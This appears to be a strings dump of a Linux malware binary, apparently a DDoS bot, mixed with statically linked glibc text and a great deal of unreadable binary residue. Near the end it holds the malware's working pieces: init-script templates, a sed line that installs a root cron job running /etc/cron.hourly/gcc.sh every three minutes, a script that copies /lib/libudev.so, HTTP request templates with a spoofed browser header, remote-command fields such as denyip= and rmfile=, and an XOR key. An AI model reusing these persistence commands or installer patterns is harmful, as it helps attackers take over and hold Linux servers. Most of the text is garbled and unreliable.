PTRh <
[^_]
[^_]
[^_]
[^_]
[^_]
<;/u
[^_]
[^_]
[^_]
<[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
t3<*
[^_]
/tmpf
[^_]
[^_]
[^_]
[^_]
t.~N
[^_]
[^_]
[^_]
[^_]
info
[^_]
WVSQ
Y[^_]
[^_]
WVS1
[^_]
[^_]
[^_]
[^_]
|.tK
[^_]
[^_]
[^_]
[^_]
|.tK
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
STATf
2.0.f
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
@d@u
@d@u
[^_]
[^_]
PPPe
@d@uM
Ad@u
[^_]
 [^_]
[^_]
 [^_]
[^_]
u:;{
Su'e
WVSU
][^_
WVSU
][^_
@u*9
WVSU
@uD9
][^_
[^_]
[^_]
[^_]
<	wF
,[^_]
[^_]
95`0
95`0
[^_]
4$e3
[^_]
gfff
gfff
[^_]
[^_]
D[^_]
0<	v 
	vcf
X[^_]
X[^_]
0<	v 
[^_]
[^_]
[^_]
t!:G
,[^_]
[^_]
ti9E
[^_]
[^_]
[^_]
[^_]
[^_]
;N tv
0[^_]
0[^_]
[^_]
G +G
u8+}
CL~,
@9GLs;
[^_]
[^_]
[^_]
[^_]
|	9M
[^_]
[^_]
[^_]
<at%
[^_]
0<_t5<-t1<.t-<,f
t'<:t#</
<+tb<b
<mt`<x
tS;E
O +O
[^_]
[^_]
[^_]
t	)A
([^_]
SH9z
 [^_]
([^_]
[^_]
VH9Z
SH9r
[^_]
ZhxX
[^_]
SH9r
[^_]
C +C
[^_]
@t;=
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
9r0t
@[^_]
$[^_]
[^_]
 [^_]
[^_]
ti	E
,[^_]
>AELDt
`[^_]
`[^_]
[^_]
w	9u
[^_]
[^_]
<8#}
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
AELD
[^_]
[^_]
[^_]
[^_]
[^_]
GuP1
t(8(
8(t}
@+D$
[^_]
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQj
t0@Nt
t(@Nt
Gu~1
GuL1
[^_]
u7;S
[^_]
[^_]
[^_]
[^_]
[^_]
/POS
IX_Vf
[^_]
VUUU
@[^_]
@[^_]
[^_]
Genu
Auth
cAMD
enti
ntel
ineI
}~=`
POSI
X_V6
_ILP
32_O
FF32
POSI
X_V6
_ILP
32_O
FFBI
POSI
X_V6
_LP6
4_OFf
POSI
X_V6
_LPB
IG_O
FFBI
3C,1
3C81
u-WVS
[^_=
PWVS
[^_]
[^_]
out 
gfff
of m
emor
USVW
_^[]=
USVW
_^[]=
_^[]
[^_]
[^_]
[^_]
,[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_=
Su'e
4[^_]
4[^_]
[^_]
[^_]
[^_]
$[^_]
[^_]
[^_]
[^_]
<.u?
tdte
tdtP
[^_]
[^_]
[^_]
uI9E
[^_]
[^_]
ty9u
[^_]
[^_]
[^_]
ti|o
[^_]
[^_]
[^_]
/usr
/lib
/gcof
/usr
/lib
/gcof
gcon
v-mo
dulef
[^_]
`[^_]
`[^_]
`[^_]
`[^_]
d[^_]
d[^_]
D[^_]
D[^_]
D[^_]
[^_]
P[^_]
[^_]
`[^_]
`[^_]
`[^_]
`[^_]
P[^_]
P[^_]
P[^_]
P[^_]
P[^_]
P[^_]
H[^_]
H[^_]
H[^_]
[^_]
t#;u
t[^_]
[^_]
<[^_]
[^_]
WVS1
tm9]
[^_]
tW9]
[^_]
[^_]
[^_]
[^_]
*<_t/<-t+<.t'<,
t <:t
+<_t0<-t,<.t(<,t$<:t </
C t=
9S w
[^_]
9S w
[^_]
[^_]
C t>
9K w
[^_]
9K w
[^_]
/SYS
[^_]
[^_]
kA$l
[^_]
[^_]
[^_]
B	<8
/loc
ale.
aliaf
[^_]
[^_]
t]<:
[^_]
[^_]
 [^_]
;@t0
[^_]
[^_]
[^_]
[^_]
tT< tF<	tB
0<	w
H	tHe
0<	v
([^_]
[^_]
[^_]
[^_]
[^_]
f;;u
@[^_]
@[^_]
0<	v
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
u!;C
[^_]
<	wje
[^_]
PH9Z
 <Zw
[^_]
[^_]
 <Zw
9N,w
 <Zw
 <Zw
 <Zw
 <Zw
 <Zw
<}w/1
[^_]
F0[^_]
[^_]
<	wje
[^_]
<}w^
[^_]
\$+)
D$+)
[^_]
<}wJ
gfff
[^_]
[^_]
<*t <'t
 <)w
L<.w
[^_]
t'<%t#
[^_]
x[^]
@,+B$
C +C
[^_]
[^_]
[^_]
[^_]
BX+H
([^_]
[^_]
~T9u
[^_]
P$;P(
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
([^_]
Gu[1
Gu#1
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
\[^)
[^_]
[^_]
[^_]
gfff
[^_]
[^_]
[^_]
[^_]
C$+E
[^_]
[^_]
[^_]
[^_]
t!</
9=dC
95xC
0[^_]
0[^_]
[^_]
[^_]
gfff
W t4
gfff
$[^_]
[^_]
[^_]
$[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
-uQ;u
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
@bQs
[^_]
<Ou)
<Pu)
<Lu)
$[^_]
<}t(1
[^_]
[^_]
[^_]
[^_]
<	wq
[^_]
<	vA8
[^_]
<	w2
[^_]
[^_]
<	vG8
<	w2
<	v\8
<	ww
<	w2
<	vW
<	ww
<	w2
<	vN
<	w4
<	w4
\[^_]
[^_]
[^_]
,[^_]
,[^_]
[^_]
@bQs
<%td<
[^_]
<lt|<Ztx<ut~
[^_]
[^_]
[^_]
UPQR
y	ZZY
[^_]
[^_]
C$tF
[^_]
[^_]
[^_]
A$;8s
[^_]
TRAN
SLIT
[^_]
[^_]
[^_]
[^_]
X[^_]
X[^_]
0<	v&
t(:C
[^_]
[^_]
<	vD
[^_]
0tB1
<	vY
<	v/
[^_]
<3pu
0<	v
VUUU+
t,<0
t(:C
[^_]
[^_]
$[^_]
$[^_]
$[^_]
$[^_]
<	vD
[^_]
0tU1
<	v`
<	v/
[^_]
0<	v
VUUU+
t(:C
[^_]
[^_]
$[^_]
$[^_]
$[^_]
$[^_]
<	vD
[^_]
0tU1
<	v`
<	v/
[^_]
0<	v
VUUU+
R Iu
h[^_]
h[^_]
h[^_]
Jt.P
X[^_
Bt(P
X[^_
[^_]
[^_]
WVUS
[]^_
[^_]
[^_]
L[^_]
L[^_]
H[^_]
H[^_]
[^_]
[^_]
R Iu
WVUS
[]^_
[^_]
$[^_]
$[^_]
[^_]
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQj
[^_]
u1;M
[^_]
[^_]
4[^_]
4[^_]
[^_]
[^_]
$[^_]
gmon
seco
.pro
file
[^_]
[^_]
[^_]
[^_]
[^_]
H[^_]
[^_]
[^_]
[^_]
t=;E
[^_]
[^_]
WVUS
[]^_
[^_]
[^_]
@[^_]
[^_]
[^_]
L[^_]
t"9@
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
 t%~
[^_]
t4<L
[^_]
<[^_]
<[^_]
[^_]
D9[u
Ac@t
Ac@t
[^_]
Bc@t
[^_]
Bc@u
,[^_]
,[^_]
Ac@t
WL;Q
[^_]
WVSRP
 ^_]
 ^_]
 t#~
 t#~
x	zt
[^_]
[^_]
0^_]
0^_]
[^_]
[^_]
t19~
98t7
<[^_]
[^_]
[^_]
r	;J
[^_]
 t%~
L[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
9F<v$
[^_]
[^_]
,[^_]
[^_]
/etc/init.d/%s
/etc/rc%d.d/S90%s
--del
chkconfig
remove
update-rc.d
/etc/cron.hourly/gcc.sh
/etc/rc.d/rc%d.d/S90%s
--add
defaults
/proc/%d/exe
/proc/self/exe
HOME=/
MYSQL_HISTFILE=/dev/null
#!/bin/sh
# chkconfig: 12345 90 90
# description: %s
### BEGIN INIT INFO
# Provides:		%s
# Required-Start:	
# Required-Stop:	
# Default-Start:	1 2 3 4 5
# Default-Stop:		
# Short-Description:	%s
### END INIT INFO
case $1 in
start)
stop)
esac
sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
/proc/rs_dev
GET %s HTTP/1.1
%sHost: %s
POST %s HTTP/1.1
%sHost: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
%s%s
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Connection: Keep-Alive
%s/%s
socket:[
/proc/net/tcp
/proc
/proc/%d/fd
/proc/%s/fd/%s
md5=
denyip=
filename=
rmfile=
%u:%s|
%d--%s_%d:%s|
m4S4nAC/n&ZV
A/TB
m.[$n__#4%\C
m.[$n3
/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
*6F6{
  oQZGE'C#l]4&
U./'PR
C'BB6S2u
o".T
>2B6oTQ& 5XA
!-_|p
qAA9541F0
iD@36AIA95
r`CA
o7Ds
2BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0
iD@36AIA95
2ro`D
dC1rk7
2BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0CB2F
74AAA95
1F0H
8qdv
})6j}1
0xBbF.3DA5AE5}1
0xBbF.3DA5AE5}1
0xBbF.3DA5A45>1iUC!
&9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0m7A4nQ_/nA
m [(n3
m6_6n3
m4S4nAC/nA
/proc/cpuinfo
%d*%d
/proc/meminfo
127.0.0.1
/etc/resolv.conf
nameserver
nameserver %15[0-9.]
22Bh9KN 5 M
hS-/
=66N
V!W#6S2u
o".T
>2B6oTQ& 5XA
!-_|p
qAA9541F0
iD@36AIA95
r`CA
o7Ds
2BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0
iD@36AIA95
2ro`D
dC1rk7
2BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0CB2F
74AAA95
1F0H
8qdv
})6j}1
0xBbF.3DA5AE5}1
0xBbF.3DA5AE5}1
0xBbF.3DA5A45>1iUC!
&9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0p
FATAL: exception not rethrown
/proc/sys/kernel/version
/proc/sys/kernel/osrelease
FATAL: kernel too old
FATAL: cannot determine kernel version
/dev/full
set_thread_area failed when setting up thread-local storage
UUUU
?3333
	^B{	I
UUUUUUUU
?33333333
UUUUUUU
P^Cy
^B{	$I
/bin/sh
exit 0
LIBC_FATAL_STDERR_
/dev/tty
======= Backtrace: =========
======= Memory map: ========
/proc/self/maps
,ccs=
corrupted double-linked list
<unknown>
malloc: top chunk is corrupt
malloc: using debugging hooks
TOP_PAD_
PERTURB_
MMAP_MAX_
ARENA_MAX
ARENA_TEST
PER_THREAD
TRIM_THRESHOLD_
MMAP_THRESHOLD_
Arena %d:
system bytes     = %10u
in use bytes     = %10u
Total (incl. mmap):
max mmap regions = %10u
max mmap bytes   = %10lu
free(): invalid pointer
free(): invalid size
malloc(): memory corruption
realloc(): invalid pointer
realloc(): invalid next size
realloc(): invalid old size
*** glibc detected *** %s: %s: 0x%s ***
double free or corruption (!prev)
free(): invalid next size (normal)
free(): invalid next size (fast)
double free or corruption (fasttop)
double free or corruption (top)
double free or corruption (out)
free(): corrupted unsorted chunks
munmap_chunk(): invalid pointer
malloc(): memory corruption (fast)
malloc(): smallbin double linked list corrupted
malloc(): corrupted unsorted chunks
malloc(): corrupted unsorted chunks 2
ANSI_X3.4-1968//TRANSLIT
GETCONF_DIR
/usr/libexec/getconf
/proc/sys/kernel/ngroups_max
LP64_OFF64
LPBIG_OFFBIG
/proc/sys/kernel/rtsig-max
-m32
-m64
-D_LARGEFILE64_SOURCE
glibc 2.5
NPTL 2.5
/bin:/usr/bin
-m32 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
-D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
/dev/log
<%d>
%h %e %T 
[%d]
/dev/console
syslog: unknown facility/priority: %x
MemFree: %ld kB
MemTotal: %ld kB
/proc/stat
processor
%d.%d.%d.%d
dlopen
cannot create TLS data structures
/var/tmp
/var/profile
apic
mtrr
cmov
pse36
clflush
acpi
fxsr
sse2
ia64
i386
i486
i586
i686
GCONV_PATH
GETCONF_DIR
HOSTALIASES
LD_AUDIT
LD_DEBUG
LD_DEBUG_OUTPUT
LD_DYNAMIC_WEAK
LD_LIBRARY_PATH
LD_ORIGIN_PATH
LD_PRELOAD
LD_PROFILE
LD_SHOW_AUXV
LD_USE_LOAD_BIAS
LOCALDOMAIN
LOCPATH
MALLOC_TRACE
NIS_PATH
NLSPATH
RESOLV_HOST_CONF
RES_OPTIONS
TMPDIR
TZDIR
LD_AOUT_LIBRARY_PATH
LD_AOUT_PRELOAD
LD_WARN
LD_LIBRARY_PATH
LD_BIND_NOW
LD_BIND_NOT
LD_DYNAMIC_WEAK
LD_PROFILE_OUTPUT
/etc/suid-debug
MALLOC_CHECK_
LD_ASSUME_KERNEL
alias
module
ISO-10646/UCS4/
=INTERNAL->ucs4
=ucs4->INTERNAL
UCS-4LE//
=INTERNAL->ucs4le
=ucs4le->INTERNAL
ISO-10646/UTF8/
=INTERNAL->utf8
=utf8->INTERNAL
ISO-10646/UCS2/
=ucs2->INTERNAL
=INTERNAL->ucs2
ANSI_X3.4-1968//
=ascii->INTERNAL
=INTERNAL->ascii
UNICODEBIG//
=ucs2reverse->INTERNAL
=INTERNAL->ucs2reverse
UCS4//
ISO-10646/UCS4/
UCS-4//
ISO-10646/UCS4/
UCS-4BE//
ISO-10646/UCS4/
CSUCS4//
ISO-10646/UCS4/
ISO-10646//
ISO-10646/UCS4/
10646-1:1993//
ISO-10646/UCS4/
10646-1:1993/UCS4/
ISO-10646/UCS4/
OSF00010104//
ISO-10646/UCS4/
OSF00010105//
ISO-10646/UCS4/
OSF00010106//
ISO-10646/UCS4/
WCHAR_T//
INTERNAL
UTF8//
ISO-10646/UTF8/
UTF-8//
ISO-10646/UTF8/
ISO-IR-193//
ISO-10646/UTF8/
OSF05010001//
ISO-10646/UTF8/
ISO-10646/UTF-8/
ISO-10646/UTF8/
UCS2//
ISO-10646/UCS2/
UCS-2//
ISO-10646/UCS2/
OSF00010100//
ISO-10646/UCS2/
OSF00010101//
ISO-10646/UCS2/
OSF00010102//
ISO-10646/UCS2/
ANSI_X3.4//
ANSI_X3.4-1968//
ISO-IR-6//
ANSI_X3.4-1968//
ANSI_X3.4-1986//
ANSI_X3.4-1968//
ISO_646.IRV:1991//
ANSI_X3.4-1968//
ASCII//
ANSI_X3.4-1968//
ISO646-US//
ANSI_X3.4-1968//
US-ASCII//
ANSI_X3.4-1968//
US//
ANSI_X3.4-1968//
IBM367//
ANSI_X3.4-1968//
CP367//
ANSI_X3.4-1968//
CSASCII//
ANSI_X3.4-1968//
OSF00010020//
ANSI_X3.4-1968//
UNICODELITTLE//
ISO-10646/UCS2/
UCS-2LE//
ISO-10646/UCS2/
UCS-2BE//
UNICODEBIG//
GCONV_PATH
/usr/lib/gconv/gconv-modules.cache
gconv
gconv_init
gconv_end
LOCPATH
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
LC_MESSAGES
LC_PAPER
LC_NAME
LC_ADDRESS
LC_TELEPHONE
LC_MEASUREMENT
LC_IDENTIFICATION
?HP[hw
LC_ALL
LANG
/usr/lib/locale
/usr/lib/locale/locale-archive
upper
lower
alpha
digit
xdigit
space
print
graph
blank
cntrl
punct
alnum
toupper
tolower
POSIX
ANSI_X3.4-1968
/usr/share/locale
plural=
nplurals=
{fG5
0123456789abcdefghijklmnopqrstuvwxyz
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZto_outpunct
(nil)
(null)
*** %n in writable segment detected ***
*** invalid %N$ use detected ***
to_inpunct
                0000000000000000
Unknown error 
/etc/localtime
Universal
%[^0-9,+-]
%hu:%hu:%hu
M%hu.%hu.%hu%n
TZDIR
TZif
posixrules
/usr/share/zoneinfo
%H:%M
%H:%M:%S
%m/%d/%y
%Y-%m-%d
%I:%M:%S %p
ndots:
timeout:
attempts:
inet6
ip6-bytestring
no-ip6-dotint
rotate
no-check-names
LOCALDOMAIN
domain
search
sortlist
options
RES_OPTIONS
cannot create cache for search path
ELF file data encoding not little-endian
ELF file version ident does not match current one
ELF file version does not match current one
only ET_DYN and ET_EXEC can be loaded
ELF file's phentsize not the expected size
file=%s [%lu];  generating link map
cannot create shared object descriptor
ELF load command address/offset not properly aligned
object file has no loadable segments
cannot dynamically load executable
cannot change memory protections
ELF load command alignment not page-aligned
cannot allocate TLS data structures for initial thread
failed to map segment from shared object
object file has no dynamic section
shared object cannot be dlopen()ed
cannot allocate memory for program header
cannot enable executable stack as shared object requires
  dynamic: 0x%0*lx  base: 0x%0*lx   size: 0x%0*Zx
    entry: 0x%0*lx  phdr: 0x%0*lx  phnum:   %*u
cannot create search path array
cannot create RUNPATH/RPATH copy
file=%s [%lu];  needed by %s [%lu]
find library=%s [%lu]; searching
cannot open shared object file
cannot allocate name record
 search path=
		(%s from file %s)
		(%s)
file too short
cannot read file data
invalid ELF header
ELF file OS ABI invalid
ELF file ABI version invalid
internal error
  trying file=%s
cannot stat shared object
cannot map zero-fill pages
cannot close file descriptor
system search path
ORIGIN
PLATFORM
RPATH
RUNPATH
wrong ELF class: ELFCLASS64
/lib/
/usr/lib/
/etc/ld.so.cache
 search cache=%s
ld.so-1.7.0
glibc-ld.so.cache1.1
symbol=%s;  lookup in file=%s [%lu]
file=%s [%lu];  needed by %s [%lu] (relocation dependency)
binding file %s [%lu] to %s [%lu]: %s symbol `%s'
 (no version symbols)
symbol 
, version 
 not defined in file 
 with link time reference
<main program>
relocation error
symbol lookup error
protected
normal
 [%s]
undefined symbol: 
cannot allocate memory in static TLS block
cannot make segment writable for relocation
%s: Symbol `%s' has different size in shared object, consider re-linking
%s: no PLTREL found in object %s
%s: out of memory to store relocation results for %s
cannot restore segment prot after reloc
 (lazy)
relocation processing: %s%s
<program name unknown>
unexpected reloc type 0x
unexpected PLT reloc type 0x
cannot apply additional memory protection after relocation
DYNAMIC LINKER BUG!!!
%s: %s: %s%s%s%s%s
continued
fatal
%s: error: %s: %s (%s)
out of memory
error while loading shared libraries
GLIBC_PRIVATE
_dl_open_hook
gconv_trans_context
gconv_trans
gconv_trans_init
gconv_trans_end
^[yY]
^[nN]
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
March
April
June
July
August
September
October
November
December
%a %b %e %H:%M:%S %Y
%a %b %e %H:%M:%S %Z %Y
%p%t%g%t%m%t%f
%a%N%f%N%d%N%b%N%s %h %e %r%N%C-%z %T%N%c%N
+%c %a %l
ISO/IEC 14652 i18n FDCC-set
Keld Simonsen
keld@dkuug.dk
+45 3122-6543
+45 3325-6543
1997-12-20
ISO/IEC JTC1/SC22/WG20 - internationalization
C/o Keld Simonsen, Skt. Jorgens Alle 8, DK-1615 Kobenhavn V
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
libc
OUTPUT_CHARSET
charset=
LANGUAGE
messages
inity
[Am-
kpnJ
uD;s
)r+[
[!|n
uYD?e
I9C-
I!G.
U^h6LU3
U.y`
3?Cy
'_Djz
$po?b
w};u
=t%j
MP0!
t0tv
=u8Q)+
*~xx
~j2=
|;#o
Ac+;
^2XX%
!{>;b
dI@B
2I%%
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Name not unique on network
File descriptor in bad state
Remote address changed
Streams pipe error
Too many users
Destination address required
Message too long
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address already in use
Network is down
Network is unreachable
Connection reset by peer
No buffer space available
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
Operation canceled
Required key not available
Key has expired
Key has been revoked
Key was rejected by service
Owner died
State not recoverable
Resource temporarily unavailable
Inappropriate ioctl for device
Numerical argument out of domain
Too many levels of symbolic links
Value too large for defined data type
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Socket operation on non-socket
Protocol wrong type for socket
Address family not supported by protocol
Cannot assign requested address
Network dropped connection on reset
Software caused connection abort
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
_dlfcn_hook
%s%s%s
%s%s%s: %s
unsupported dlinfo request
invalid namespace
Unknown error
0123456789abcdef
%s: cannot open file: %s
%s: cannot create file: %s
%s: cannot map file: %s
%s: cannot stat file: %s
%s: file is no correct profile data file for `%s'
Out of memory while initializing profiler
invalid mode for dlopen()
cannot extend global scope
cannot create scope list
no more namespaces available for dlmopen()
invalid target namespace in dlmopen()
empty dynamic string token substitution
opening file=%s [%lu]; direct_opencount=%u
TLS generation counter wrapped!  Please report this.
closing file=%s; direct_opencount=%u
file=%s [%lu];  destroying link map
TLS generation counter wrapped!  Please report as described in <http://www.gnu.org/software/libc/bugs.html>.
calling fini: %s [%lu]
dlclose
shared object not open
IGNORE
invalid mode parameter
DST not allowed in SUID/SGID programs
cannot load auxiliary `%s' because of empty dynamic string token substitution
empty dynamics string token substitution
load auxiliary object=%s requested by file=%s
load filtered object=%s requested by file=%s
cannot allocate dependency list
cannot allocate symbol search list
Filters not supported with LD_TRACE_PRELINKING
calling init: %s
calling preinit: %s
checking for version `%s' in file %s [%lu] required by file %s [%lu]
no version information available (required by 
cannot allocate version reference table
unsupported version 
 of Verdef record
weak version `
' not found (required by 
 of Verneed record
RTLD_NEXT used in code not dynamically loaded
*** stack smashing detected ***: %s terminated
!#Ff3VE.-7
V[_ 0
 #A.A
k$U6
k-R6
6-BF
,'F55RBal W5
,'F55RBal WA[AF
%0W6a
1.W#1
i$GUA
'!Z)a
P(/%
+$Q)/U_&a$M]
+$Q)/U_&A
0-G2$
%,]+$
B$3,P[U]F
5*]F
5*]',Z6
25VF
72F/,V6
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
BB2FA36AAA9541F0
8.8.8.8
8.8.4.4
CAk[S
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-46)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-46)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-48)
GCC: (GNU) 4.1.2 20080704 (Red Hat 4.1.2-46)
.shstrtab
.note.ABI-tag
.init
.text
__libc_freeres_fn
__libc_thread_freeres_fn
.fini
.rodata
__libc_subfreeres
__libc_atexit
__libc_thread_subfreeres
.eh_frame
.gcc_except_table
.tdata
.tbss
.ctors
.dtors
.jcr
.data.rel.ro
.got
.got.plt
.data
.bss
__libc_freeres_ptrs
.comment
